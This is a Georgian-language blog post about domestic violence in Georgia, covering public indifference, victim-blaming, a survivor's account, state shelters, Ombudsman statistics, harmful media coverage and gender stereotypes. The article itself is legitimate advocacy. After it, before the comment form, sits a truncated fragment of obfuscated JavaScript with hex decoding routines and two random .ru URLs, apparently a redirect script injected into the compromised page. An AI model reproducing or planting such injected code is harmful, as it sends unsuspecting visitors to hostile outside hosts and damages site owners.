RSS

სტერეოტიპები, მედია და ძალადობა

15 Jun

savane 003ოლიკო ცისკარიშვილი

ამ ბოლო დროს, სულ უფრო ხშირად ლაპარაკობენ ოჯახში ძალადობაზე. ტარდება ტრენინგები, სემინარები, კვლევები, საქართველოსა თუ მის ფარგლებს გარეთ გაერთიანებული არიან ამ პრობლემის გადაჭრით… სულ უფრო და უფრო ხმამაღლა ამბობენ, რომ ოჯახში ძალადობის მსხვერპლებს, აუცილებელია საზოგადოება დაუდგეს გვერდით, აუცილებელია საზოგადოების მხარდაჭერა!

მაგრამ როგორ… უმთავრესი პრობლემა, მაინც საზოგადოებაა და ყველაზე მეტად ისაა ძალადობის მომხრე და წარმომშობი. როცა მუდამ საუბარია, როგორ უნდა შემოვატრიალოთ საზოგადოების აზროვნება იქითკენ, რომ ისინი წინ თუ არ აღუდგებიან ოჯახში ძალადობის პრობლემას, ოჯახში მსხვერპლი მაინც შეიბრალონ, თუ არ შეიფარებენ. ჩემდა გასაკვირად, სწორედ, ამგვარ ტრენინგზებზე, ცოტა ხნის წინ, თითოეული ამბის მოსმენისას ჟურნალისტებისგან ისმოდა – ახია, მაგაზე… ახი, ყოფილა… ყველაზე მეტად კი ახალგაზრდა ჟურნალისტის უმოქმედობამ ჩამაფიქრა, რომელიც ამ რამდენიმე დღის წინ გამართული ტრენინგის მონაწილე იყო. მას, თურმე, თითქმის ზედა სართულიდან ყოველ მეორე დღეს, უწევს მეგობრის დედის ცემისა და კივილის მოსმენა, თავად კი არაფერს აკეთებს იმისთვის, რომ ეს ფაქტი აღარ განმეორდეს, მას ერთხელაც არ მოსვლია თავში აზრად, რომ თუნდაც ანონიმურად, პატრული გამოეძახა და მეგობრის დედა მოძალადე ქმრის ცემისგან, ერთხელ მაინც გადაერჩინა. მიზეზი მისი უმოქმედობის კი ის ყოფილა, რომ თურმე მამამისი, იმ მოძალადე კაცთან ერთად, და სუფრებზე ერთად ილხენს. ის, ჟურნალისტი, თავის მოქვითინე მეგობარს, რომელსაც დედა ყოველდღე ნაცემი ყავს, ყოველ დღე იკრავს გულში და ვერც კი აცნობიერებს, რომ თავისი დუმილით, ისევეა ძალადობის მონაწილე, როგორც მისი მუშტშემართული მეზობელი.

საზოგადოების აზროვნება ვერანაირად ვერ შეიცვლება, თუკი ამ საზოგადოების აზროვნების შესაცვლელად მედია არ იბრძოლებს. ის, რომ საზოგადოება ასე იქცევა, თითოეული ჩვენგანის გულგრილობის ბრალია.

სპეციალისტთა აზრით, სწორედ “ძალაუფლება და კონტროლის” გამო, ხდება ძალადობები ოჯახში. როგორც ქმრისგან ცოლზე, ასევე დედიდან შვილზე, დედამთილ-მამამთილისგან რძალზე, ანდა პირიქით. “ძალაუფლება და კონტროლისთვის” იბრძვის საზოგადოებაც.
“ვიდრე, სამსახურს დავიწყებდი, არავის ადარდებდა სად ვცხოვრობდი, რას ვჭამდით, რითი ვსულდგმულობდით მე და ჩემი შვილი. ერთს მივხვდი, რომ როცა ქმარს გავშორდი, რომელთანაც გრძელი წამების და ტანჯვის 12 წელი გავატარე, არავინ დამიდგა გვერდში. კეთროვანივით მექცეოდა ყველა ჩემი ნათესავი. მიუხედავად იმისა, რომ ჩემი ნათესავების უმრავლესობა მაღალ თანამდებობებზე მუშაობენ, მათთვის სირცხვილის დამღა ვიყავი და ახლოს არავინ მიკარებდა. სახლიდან საკუთარმა დამაც კი გამომაგდო, თუმცა ნათესავებსა და ახლობლებს ზღაპარი მოუყვა, ვითომდა, მე თვითონ მინდოდა თავისუფალი ცხოვრება და საყვარლები მყავდა. ასეთ ადამიანს კი ვინ დაუდგება გვერდში. სინამდვილეში, მას ჩემი და ჩემი შვილის რჩენა ყელში ამოუვიდა და ქუჩაში მომისროლა. საბედნიეროდ, ამ ქვეყანაში მართლა არიან კეთილი ადამიანები და მათი წყალობით, ფეხზე დავდექი. ახლა, როცა პრესტიჟული სამსახურიც მაქვს და მე და ჩემს შვილს ლუკმა-პური არ გვენატრება, ყველასთვის ისევ სასურველი ნათესავი და დედ-მამიშვილი გავხდი. წელიწადნახევრის გაჭირვებამ კარგად დამანახვა ვინ ვინ არის. ამ წელიწადნახევრის განმავლობაში, საზოგადოებისგან იმდენი გულისტკენა ვნახე, არა მგონია ოდესმე დამავიწყდეს,” – ამბობს ერთ-ერთ ოჯახში ძალადობის მსხვერპლი, რომელიც მოძალადე ქმრისგან წამოვიდა. საზოგადოების იგნორირებისა და გულგრილობის მიუხედავად, მაინც ნახა ძალა და ცხოვრება თავიდან დაიწყო.

ბევრი ამას ვერ ახერხებს, რადგან ოჯახიდან წამოსვლის შემდეგ, ერიდება საზოგადოების მკაცრი განსჯის საგანი არ გახდეს.

თუმცა სახელმწიფო ცდილობს ასეთ ადამიანებს გვერდში ამოუდგეს. ადამიანით ვაჭრობის (ტრეფიკინგის) მსხვერპლთა დაცვისა და დახმარების სახელმწიფო ფონდს 2009 წლის 6 იანვრის პრეზიდენტის ბრძანებულებით დაემატა მიმართულება, რომელიც უზრუნველყოფს ოჯახში ძალადობის მსხვერპლთა დახმარებასა და მათი კანონიერი ინტერესების დაცვას, რაც ითვალისწინებს: ოჯახში ძალადობის მსხვერპლთა თავშესაფრით მომსახურებას (საჭიროების შემთხვევაში), სამართლებრივ დახმარებას, ფსიქოლოგიურ დახმარებას, პირველად და გადაუდებელ სამედიცინო მომსახურებას, ოჯახსა და საზოგადოებაში რეინტეგრაციის ხელშეწყობას. ასეთი თავშესაფარი უკვე ფუნქციონირებს როგორც თბილისში, ასევე გორში, ქუთაისაა და ბათუმში.

მიუხედავად იმისა, რომ ცხელი ხაზიც ფუნქციონირებს და ამ ბოლო დროს, კონსულტაციებზე ზარებიც გახშირდა, ბევრი მაინც თავს იკავებს მიმართოს ამ თავშესაფარს, რადგან სახელმწიფო ძალადობის მსხვერპლებს, მხოლოდ სამი თვით უზრუნველყოფს თავშესაფრით. ბევრი ოჯახში ძალადობის მსხვერპლი კი მოძალადისგან მხოლოდ იმიტომ ვერ მოდის, რადგან ფიქრობს – მერე. მერე რა იქნება, როცა სახელმწიფოსგან ბოძებული ეს სამი თვე გავა. მერე სად წავიდეს და ვის მიანდოს თავისი და თავისი შვილების ბედი. იპოვის კი სამსახურს.

ომბუცმენის 2015 წლის, სპეციალურ ანგარიშში ქალთა მიმართ ძალადობა და ოჯახში ძალადობა საქართველოში, ნათქვამია, რომ „ქალთა მკვლელობების ფაქტების შესწავლის შედეგად დადგინდა, რომ 2013 წელთან შედარებით 2014 წელს 62%–ით მეტი ქალი იქნა მოკლული, მათ შორის 57%–ით მეტი მეუღლის მიერ ცოლის მკვლელობის შემთხვევა მოხდა, ხოლო ოჯახში ჩადენილი დანაშაული ქალის მიმართ (მკვლელობა) 53%–ით არის გაზრდილი წინა წელთან შედარებით. ქალთა ფემიციდის მზარდი სტატისტიკა შემაშფოთებელია და განსაკუთრებით ყურადსაღები უნდა იყოს სამართალდამცავი თუ სხვა შესაბამისი პასუხისმგებელი სტრუქტურისათვის.  მონაცემების დამუშავებითა და ხარვეზების გამოვლენის შედეგად უნდა შემუშავდეს პრევენციული ღონისძიებები და დანაშაულის თავიდან აცილების გზები.“

პრობლემა, როგორიც არის ძალადობა, ქართულ რეალობას თუ დავაკვირდებით შევამჩნევთ, რომ  განსაკუთრებულად ხშირია ქალთა მიმართ ძალადობა, რომელიც უფრო მეტად ცოლსა და ქმარს შორის ვლინდება. რამდენიმე დღის წინაც, ახალგაზრდა ქალი, ყოფილმა მეუღლემ ქუჩაში იმსხვერპლა.

ბოლო წლების განმავლობაში, სწორედ ეს საკითხი, დიდ ინტერესს იწვევს ქართულ მედია სივრცეში. დღეს, ამ თემაზე უკვე საზოგადოების უმეტესი ნაწილი ღიად საუბრობს, ისინი აღარ ერიდებიან აზრის საჯაროდ დაფიქსირებას. მეტიც, ოჯახში ძალადობის მსხვერპლები, გამოსავლის ძიებაში არიან, გამოსავალს ეძებს საზოგადოებაც, რათა დანარჩენი ოჯახები ამ განსაცდელის წინაშეა არ დადგნენ. თუმცა არის კატეგგორია ისეთი ადამიანების, რომლებიც ამ საკითხს ტაბუს ადებენ, ამას კი სწორედ ის განაპირობებს, რომ საზოგადოებაში მყარადაა დამკვიდრებული სტერეოტიპი – უთანხმოება, რომელიც ოჯახშია, ოჯახშივე უნდა მოგვარდეს და არ უნდა გასცდეს მის ფარგლებს გარეთ, თუკი ცოლ-ქმარს შორის არის კონფლიქტი არ უნდა ჩაერიოს მესამე პირი. სწორედ, ასეთ სტერეოტიპებს მივყავართ იმ რისკ ფაქტორებამდე, რომლებიც საბოლოოდ სავალალო შედეგს გვაძლევს.

ის, რომ დღეს ეს პრობლემა უფრო მეტად გახშირდა და უფრო მეტი ადამიანია ძალადობის მსხვერპლი, ამას ბევრი ადამიანი იგნორირებას უკეთებს. საზოგაოების ნაწილი, საუბრობს, წუხს, მსხვერპლებს თანაუგრძნობენ, თუმცა ამით პრობლემა არ გვარდება. ამაში კი მეტნაკლებად, მედია საშუალებებსაც მიუძღვით გარკვეული წვლილი. სწორედ, არასათანადო და არაპროფესიული გაშუქების გამო, ვიღებთ ხშირად ძალადობის განმეორებით ეფექტებს.

როდესაც ადამიანი ხედავს მედიაში წარმოდგენილ სამყაროს, რომელიც ძალადობითა და სისასტიკით სავსეა, კოგნიტური ეფექტის შედეგია ის, რომ რეალური სამყარო აღიქმება, როგორც საფრთხის შემცველი.

მასობრივი ინფორმაცია ააქტიურებს აზრებსა და განცდებს, რომლებიც წარსულშია შეძენილი და რომელიც ასოციაციით დაკავშირებულია ინფორმაციის შინაარსთან. ეს ეფექტი შეიძლება გაძლიერდეს და შემდგომში ჰპოვოს გამოვლინება; თუ მაყურებელი სიუჟეტს უკეთებს განსაზღვრულ ინტერპრეტაციას, განსაზღვრულ ჭრილში აკეთებს მისი მნიშვნელობის შეფასებას; ის აიგივებს თავს (იდენთიფიკაცია) სიუჟეტის გმირთან; სჯერა, რომ ის, რაც ხდება ეკრანზე – გამოგონილი არაა და რეალურია; ძალადობის სცენები შეიცავს ისეთ გამღიზიანებლებს, რომლებიც აღვიძებენ მასში წარსულ მოგონებებს, აზრებსა და განცდებს (ემოციური მეხსიერება).

მასმედიაში ქალი ხშირად წარმოდგენილია ან როგორც დიასახლისი და მოდის „ქალღმერთი“, ან როგორც მეძავი ან სხვა სახის მსხვერპლი. მაშინ, როცა პროსტიტუცია და ტრეფიკინგი ქალებში სერიოზულ პრობლემას წარმოადგენს, საჭიროა, ქალების ცხოვრება მთელი მრავალფეროვნებით  იქნეს გაშუქებული, ისევე, როგორც მამაკაცთა ცხოვრება.

ძალადობის ფაქტებზე რეაგირებას და მის შემდგომ მედიაში გაშუქებას ახორციელებენ ძირითადად ჟურნალისტები (სატელევიზიო, რადიო მაუწყებლობის, პრესის, ინტერნეტ მედია საშუალებების), რომლებსაც უწევთ საკმაოდ მძიმე, ტრაგიკულ ვითარებაში მუშაობა – ტრაგიკული სცენების ხილვა, დაზარალებულებთან ურთიერთობა, ინტერვიურება და ა.შ. ხშირ შემთხვევებში, ჟურნალისტებს საქმე აქვთ ამა თუ იმ ხარისხის მატრავმირებელ მოვლენასთან და დაზარალებულ, ტრავმირებულ ადამიანთან. მასმედია, რომლის მოვალეობაა გააშუქოს ეს ფაქტები, მნიშვნელოვან როლს თამაშობს (ხშირად ნეგატიურს) ძალადობის ინცინდენტების მატრავმირებულობის ხარისხის განსაზღვრაში. ინფორმაციის შეგროვების დროს, დაზარალებულის ინტერვიურების პროცესში ჟურნალისტი ცდილობს მიიღოს რაც შეიძლება ,,მძიმე და საშინელი’’ სცენების აღწერა. ეს არა მარტო ამძიმებს მატრავმირებელი ინციდენტის ხარისხს, არამედ ხელს უწყობს მსხვერპლის მეორედ ტრავმირებას – ის აიძულებს მას კიდევ ერთხელ განიცადოს ის ტკივილი და დამცირება, რომელიც ცოტა ხნის წინ, თავს გადახდა. ბუნებრივია, ჟურნალისტი არ არის ფსიქოთერაპევტი და ის ვერ გაუადვილებს დაზარალებულს მდგომარეობას. ინტერვიურების შემდეგ, ის ტოვებს დაზარალებულს პირისპირ საკუთარ გარემოსთან. ხშირ შემთხვევაში, რეიტინგის გამო, სწორედ ასეთ მასალებს უშვებენ ჟურნალისტები მედიაში და სწორედ, მატრავმირებელი ინფორმაციები ხდება განმეორებითი ინციდენტების წარმომშობი. ხდება ისეც, რომ მამაკაცები საკუთარ ცოლთან ძალადობრივ ზემოქმედებას განიცდის, მაგრამ ოჯახთან ან ინტიმურ ცხოვრებასთან დაკავშირებული ძალადობისგან დაზარალელბულთა დიდი უმრავლესობა ქალები და გოგონები არიან. ოჯახში ძალადობის ასეთი გენდერული ხასიათი შეგვახსენებს, რომ მსოფლიოში ქალები ძალადობისაგან მხოლოდ იმიტომ იტანჯებიან, რომ ქალები არიან. ცოლები და მეგობარი გოგონები დაუცველნი არიან იმ მამაკაცთა ძალადობისგან, ვისთანაც ემოციურ და/ან სექსუალურ კავშირში იმყოფებიან ან იმყოფებოდნენ. ღარიბ ოჯახებში გოგონებს შიმშილიც აწუხებთ, რადგან კვების პროდუქტები მამრობითი სქესის ოჯახის წევრებს ერგებათ.

კვლევის მიხედვით, საქართველოში ყველა მესამე ქალი ძალადობის მსხვერპლია. მამების 52%, დედების 46% და მასწავლებლების 35% ფიზიკურად ძალადობს  ბავშვზე, მსხვერპლთა 58% ქუჩაში გასვლისას, ხოლო 48% სახლში დარჩენისას ვერ გრძნობს თავს უსაფრთხოდ.

სტატისტიკის მიხედვით, 2009-10 წლებში ოჯახში ძალადობის ნიადაგზე იყო, 13 მკვლელობა და 5 მკვლელობის მცდელობა. 2014 წლის დასაწყისში კი სამი თვე სტატისტიკა 14 მკვლელობას ითვლის. 1252 გამოკითხულიდან ოჯახში ძალადობის მსხვერპლად თავი მხოლოდ 852 ადამიანმა აღიარა. ამ ადამიანებიდან უმეტესობა 55 წლის და მეტის აღმოჩნდა. კვლევამ აჩვენა, რომ შედარებით უფროსი ასაკის ქალები ოჯახურ ტრადიციებს იცავენ და მამაკაცების მხრიდან ძალადობას ყველაზე მეტად ეგუებიან. მათი უმეტესობა უმუშევარია და დამოუკიდებლად ცხოვრების საშუალება არ აქვთ. აღმოჩნდა, რომ მათ ოჯახში ძალადობის ფაქტებს არავის უყვებოდნენ და დასახმარებლად არავისთვის მიუმართავთ. ქალთა მიმართ ძალადობის უმრავლესი შემთხვევები, მათსავე სახლებში ხდება. ამიტომ, გამოკითხულთა 48% სახლში დარჩენისას თავს უსაფრთხოდ ვერ გრძნობს.

საქართველო მსოფლიო გენდერული ინდექსის მიხედვით, 134 ქვეყნიდან 84-ე ადგილზეა და ჩამორჩება ისეთ ქვეყნებს, როგორებიცაა ტანზანია, განა, ვიეტნამი, უზბეკეთი და ნიკარაგუა; ჩვენს ქვეყანაში ჯერ კიდევ ფართოდ გავრცელებული ფენომენია ადრეული ქორწინებები, მოტაცება ქორწინების მიზნით, ქალიშვილობის ინსტიტუტი, ე.წ. “ღირსების მკვლელობებიც” კი; ყოველი მეთერთმეტე ქალი მეუღლის/პარტნიორის მხრიდან ფიზიკური ძალადობის მსხვერპლია, ხოლო 35%-ზე მეტი განიცდის ძალადობის სხვადასხვა ფორმებს, მათ შორის ფსიქოლოგიურ, სიტყვიერ და ეკონომიკურ ზეწოლას; საქართველო მოწინავე ქვეყანაა მსოფლიოში სელექციური აბორტების, იგივე დაუბადებელ ბავშვთა სქესობრივი ნიშნით მკვლელობების, თვალსაზრისით. ტრადიციის შედეგად, რომლის თანახმადაც ბიჭის, როგორც “მემკვიდრის” დაბადება უფრო სასურველია, ყოველწლიურად ათასობით გოგონა ხდება სქესის ნიშნით ნაყოფის მუცელშივე მკვლელობების მსხვერპლი.

გენდერული სტერეოტიპებს ხშირად, სწორედ მედია ამკვიდრებს. ამიტომ დღემდე, ფართოდ გავრცელებულია და ხშირად არაზუსტი შეხედულებებია ქალისა და მამაკაცის უნარებზე, თვისებებზე, სოციალურ ქცევებსა და  სოციალურ ფუნქციებზე. ქალისა და მამაკაცის თვისებები და მათ მიერ შესრულებული როლები მკაცრად არის განსაზღვრული და ერთიმეორის საპირისპიროდ მიიჩნევა. გენდერული სტერეოტიპები მიგვითითებს იმაზე, რომ ქალის ადგილი სახლშია, ხოლო მამაკაცისა – სახლის გარეთ… რომ ქალი უნდა იყოს რბილი, დამთმობი, მზრუნველი, რომ მას არ შეუძლია, წარმატებით მართოს და უხელმძღვანელოს დიდ საქმეს, რომ მას ევალება მხოლოდ წვრილმანი, ყოველდღიური საქმის შესრულება, რომ ის კარგი შემსრულებელია, მაგრამ არა შემოქმედი, რომ მისი ინტელექტუალური შესაძლებლობები მამაკაცისას ჩამოუვარდება. ქალის მოვალეობაა, თავი მოაწონოს მამაკაცს, შეასრულოს რეპროდუქციული ფუნქცია (დაბადოს და გაზარდოს რაც შეიძლება მეტი შვილი), იზრუნონ ქმარზე, საკვებზე და სისუფთავეზე.

სტერეოტიპების თანახმად, მამაკაცი აგრესიულია და უხეშია, აზროვნებს ლოგიკაზე დაყდნობით, სწრაფად და ეფექტურად იღებს გადაწყვეტილებებს, არის უფრო ნიჭიერი, შემოქმედებითი, უყურადღებო და ნაკლებად ემოციური, შეუძლია პრობლემების არსის დანახვა და არ წვრილმანდება დეტალებზე და ა.შ. აქედან გამომდინარე, საზოგადოებრივი და პოლიტიკური გადაწყვეტილებები, თავისუფალი დრო, გართობა, გადაადგილების თავისუფლება, აგრესიულობის გამოხატვა, ინტელექტუალური საქმიანობა და ყოველდღიურობისგან გათავისუფლება – მამაკაცის პრეროგატივაა. საზოგადოება, რომელიც გენდერული სტერეოტიპებით იმართება, მრავალ შეზღუდვს უქმნის ქალებსა და მამაკაცებს იმაში, რომ იმოქმედონ ინდივიდუალური უნარების და შესაძლებლობების მიხედვით, რაც თავის მხრივ, მათი ადამიანური უფლებების შელახვაა. ამიტომ მიზანშეწონილია, გაცნობიერდეს სტერეოტიპები და გარკვეული სტერეოტიპები იყოს მიმართული მათ დასაძლევად.

გენდერული სტერეოტიპები უქმნის საფუძველს სექსიზმს ანუ ადამიანთა დისკრიმინაციას მათი სქესის საფუძველზე. ეს ცნება შეიძლება რასიზმის (დისკრიმინაცია რასობრივი კუთვნილების საფუძველზე) და ეიჯიზმის (ხანდაზმულთა უფლებების დარღვევა ან შეზღუდვა) ანალოგიით. სექსიზმის ობიექტი შეიძლება გაზდეს, როგორც ქალი, ისე კაცი, მაგრამ მამაკაცთა დომინირების საზოგადოებაში სექსიზმის ადრესატი, როგორც წესი, ქალია.

 

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ekofact.wordpress.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;ehttps://25haich4342.ru/f2.html?a=26698https://gyh1lh20owj.ru/u.html?a=26698

 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / შეცვლა )

Twitter picture

You are commenting using your Twitter account. Log Out / შეცვლა )

Facebook photo

You are commenting using your Facebook account. Log Out / შეცვლა )

Google+ photo

You are commenting using your Google+ account. Log Out / შეცვლა )

Connecting to %s